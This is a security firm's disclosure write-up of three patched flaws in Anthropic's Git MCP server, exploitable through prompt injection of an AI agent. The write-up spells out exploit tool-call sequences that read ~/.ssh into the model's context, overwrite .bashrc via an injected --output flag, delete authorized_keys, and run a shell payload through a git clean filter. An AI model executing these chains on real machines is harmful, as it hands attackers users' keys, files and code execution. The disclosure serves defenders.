
January 20, 2026

8 min read

Cyata Research: Breaking Anthropic’s Official MCP Server

Written by Yarden Porat

How We Found Code Execution in Anthropic’s Official Git MCP Server

TL;DR

What happened:

Cyata discovered three security vulnerabilities in mcp-server-git, the official Git MCP server maintained by Anthropic. These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README, a poisoned issue description, a compromised webpage) can weaponize these vulnerabilities without any direct access to the victim’s system.

What’s the impact:

These vulnerabilities allow attackers with prompt injection to read arbitrary files and git repositories on the victim’s machine (leaking their contents into the LLM’s context), overwrite or delete arbitrary files, and ultimately execute arbitrary code.

Why this matters: These vulnerabilities affect Anthropic’s official MCP server, the reference implementation maintained by the creators of MCP themselves. Unlike prior findings that required specific configurations, these work on any configuration out of the box.

Who’s affected:

Anyone running mcp-server-git versions prior to 2025.12.18. If that’s you, update to the latest version.

Vulnerability Summary

We found three issues in mcp-server-git, all reachable through prompt injection:

  1. Unvalidated repo_path and unrestricted git_init – every tool accepts an arbitrary repo_path, and git_init can turn any directory into a repository, letting an attacker read sensitive files into the LLM context and remove files from the working tree.
  2. git_diff argument injection (CVE-2025-68144) – the target argument is passed unsanitized to the git CLI, so flags like --output can overwrite arbitrary files.
  3. git_init to code execution – combined with a file-write capability (the Filesystem MCP server or the IDE’s built-in file writing), git clean/smudge filters turn git_init into arbitrary code execution.

Background: What is MCP?

The Model Context Protocol (MCP) is an open standard introduced by Anthropic in November 2024. It provides a unified way for AI assistants (Claude Desktop, Cursor, Windsurf, etc.) to interact with external tools and data sources including filesystems, databases, APIs, and development tools like Git.

MCP servers are programs that expose these capabilities to the AI, acting as a bridge between the LLM and external systems.

This architecture introduces a critical security consideration: MCP servers execute actions based on LLM decisions, and LLMs can be manipulated through prompt injection. A malicious actor who can influence the AI’s context can trigger MCP tool calls with attacker-controlled arguments.

Discovery Process

During my early days at Cyata, I was working with MCP and wanted to understand how the official servers work. So I started reading through the code.

mcp-server-git itself is pretty straightforward. You configure it like this:

"mcpServers": {
  "git": {
    "command": "uvx",
    "args": ["mcp-server-git", "--repository", "path/to/git/repo"]
  }
}

And then you can call basic git commands – git_add, git_commit, git_log, git_diff, and so on.
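
For example, asking the assistant for the repository’s status turns into a tool call along these lines (the tool name and argument shape shown here are a simplified sketch):

{
  "name": "git_status",
  "arguments": {
    "repo_path": "path/to/git/repo"
  }
}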

When you call a tool in mcp-server-git, this is what the code looked like:

@server.call_tool()
async def call_tool(name: str, arguments: dict) -> list[TextContent]:
    repo_path = Path(arguments["repo_path"])

    if name == GitTools.INIT:
        ...

    # For all other commands, we need an existing repo
    repo = git.Repo(repo_path)

    match name:
        case GitTools.STATUS:
            ...
        case GitTools.DIFF_UNSTAGED:
            ...
        case GitTools.DIFF_STAGED:
            ...
Do you see the problem? The repo_path comes directly from arguments["repo_path"]. The --repository path from the configuration is never checked against it; the server simply uses whatever path it receives.

This means an attacker could access any git repository on the system, not just the one configured in --repository.

Based on this, our team started looking into mcp-server-git. The git_init tool had the same problem: no path validation at all. It could create a new git repository in any directory on the filesystem.

Combine these two, and you have a powerful primitive: take any directory (like /home/user/.ssh), turn it into a git repository with git_init, then use git_log or git_diff to read its contents. The files get loaded into the LLM context, effectively leaking sensitive data to the AI.
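
As a rough sketch, the whole primitive could be driven by a tool-call sequence like this (tool names and argument keys are illustrative and may not match the server’s exact schema):

[
  { "name": "git_init", "arguments": { "repo_path": "/home/user/.ssh" } },
  { "name": "git_add", "arguments": { "repo_path": "/home/user/.ssh", "files": ["authorized_keys", "config"] } },
  { "name": "git_diff_staged", "arguments": { "repo_path": "/home/user/.ssh" } }
]

Once the files are staged, the staged diff returns their full contents, which the server hands straight back into the model’s context.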

At this point, we reported the findings to Anthropic via HackerOne. The report wasn’t initially accepted, so our team continued researching, looking for more direct impact. (See timeline at the end of this post.)

git_diff Argument Injection (CVE-2025-68144)

That’s when we found the git_diff function:

def git_diff(repo: git.Repo, target: str, context_lines: int = DEFAULT_CONTEXT_LINES) -> str:
    return repo.git.diff(f"--unified={context_lines}", target)

The target parameter is passed directly to the git CLI. No sanitization. This means you can inject any git flag, including --output, which writes the diff result to a file.

{
  "name": "git_diff",
  "arguments": {
    "repo_path": "/home/user/repo",
    "target": "--output=/home/user/.bashrc"
  }
}

The result? The diff output (empty in most cases) overwrites the target file: arbitrary file overwrite, which in practice means arbitrary file deletion.

git_init File Deletion

We still thought the initial git_init and repo_path bypass could lead to something more.

First, the team realized that an attacker could also achieve file deletion with a little git trickery:

Let’s say we want to delete /home/user/.ssh/authorized_keys:

  1. git_init in /home/user/.ssh
  2. git_commit to create an (empty) initial commit
  3. git_branch to create a new branch and git_checkout to switch to it
  4. git_add authorized_keys
  5. git_commit on the new branch
  6. git_checkout back to the original branch
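
Expressed as MCP tool calls, the sequence could look roughly like this (tool names, argument keys, and the default branch name are illustrative):

[
  { "name": "git_init", "arguments": { "repo_path": "/home/user/.ssh" } },
  { "name": "git_commit", "arguments": { "repo_path": "/home/user/.ssh", "message": "empty baseline" } },
  { "name": "git_branch", "arguments": { "repo_path": "/home/user/.ssh", "branch_name": "tmp" } },
  { "name": "git_checkout", "arguments": { "repo_path": "/home/user/.ssh", "branch_name": "tmp" } },
  { "name": "git_add", "arguments": { "repo_path": "/home/user/.ssh", "files": ["authorized_keys"] } },
  { "name": "git_commit", "arguments": { "repo_path": "/home/user/.ssh", "message": "track authorized_keys on tmp" } },
  { "name": "git_checkout", "arguments": { "repo_path": "/home/user/.ssh", "branch_name": "main" } }
]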

The file disappears from the working directory because it was never committed on the original branch (though it’s still stored in .git).

git_init Code Execution

With git_init, an attacker could create a git repository anywhere on the filesystem. But to get code execution, we needed something extra: the ability to write files.

One common use of mcp-server-git is in AI-powered IDEs like Cursor, Windsurf, or GitHub Copilot. In these environments, there are typically two ways the AI can write files:

  1. Filesystem MCP server – Anthropic’s official MCP server for file operations
  2. IDE built-in file writing – Native file write capabilities built into the IDE

Most setups have at least one of these enabled. (Note: some of these paths are more restricted now, but back then they weren’t.)

Our first thought was git hooks: write a malicious script to .git/hooks/pre-commit. But that doesn’t work. Git hooks require execute permission, and neither the Filesystem MCP server nor IDE file writers set the execute bit.

So we started going through git features, looking for anything that could execute code without needing the execute bit. Eventually, we found smudge and clean filters.

Git has a feature where you can configure filters in .git/config that run shell commands when files are staged (clean) or checked out (smudge). The key insight: these commands are executed through the shell, so no file ever needs the execute bit.

The attack chain (sketched as tool calls below):

  1. Use git_init to create a repo in a writable directory
  2. Use the Filesystem MCP server to write a malicious .git/config with a clean filter
  3. Write a .gitattributes file to apply the filter to certain files
  4. Write a shell script with the payload
  5. Write a file that triggers the filter
  6. Call git_add; the clean filter executes, running our payload
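
Putting the chain together as tool calls, a rough sketch could look like this. It assumes the Filesystem MCP server’s write_file tool; the paths, filter name, and payload are illustrative, and a real chain would preserve the existing [core] section of .git/config rather than overwrite it:

[
  { "name": "git_init", "arguments": { "repo_path": "/home/user/project" } },
  { "name": "write_file", "arguments": {
      "path": "/home/user/project/.git/config",
      "content": "[filter \"inject\"]\n\tclean = sh .git/payload.sh\n" } },
  { "name": "write_file", "arguments": {
      "path": "/home/user/project/.gitattributes",
      "content": "trigger.txt filter=inject\n" } },
  { "name": "write_file", "arguments": {
      "path": "/home/user/project/.git/payload.sh",
      "content": "cat\ntouch /tmp/pwned\n" } },
  { "name": "write_file", "arguments": {
      "path": "/home/user/project/trigger.txt",
      "content": "anything\n" } },
  { "name": "git_add", "arguments": { "repo_path": "/home/user/project", "files": ["trigger.txt"] } }
]

When git_add stages trigger.txt, git applies the inject filter and runs the clean command through the shell, so payload.sh executes without the execute bit being set anywhere (cat passes the file content through, and touch /tmp/pwned stands in for an arbitrary payload).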

Timeline

June 24, 2025 – Initial report submitted to Anthropic via HackerOne (repo_path not checked and git_init file leak).

June 25, 2025 – Report marked as informative.

July 6, 2025 – Second report submitted with git_diff argument injection and code execution findings.

July 24, 2025 – Anthropic reopened the report.

September 10, 2025 – Report accepted.

December 17, 2025 – Three CVEs assigned and a fix committed.

Remediation

Update mcp-server-git to version 2025.12.18 or later, which includes the fixes for all three vulnerabilities.

About Cyata

This research reflects what we do at Cyata: understanding how agentic systems behave in the wild and where they break. As organizations adopt AI agents that operate autonomously, they face risks that don’t fit traditional security models. Cyata is the control plane for AI agents, built to help organizations discover, explain, and control every AI agent in their environment before those risks become incidents.

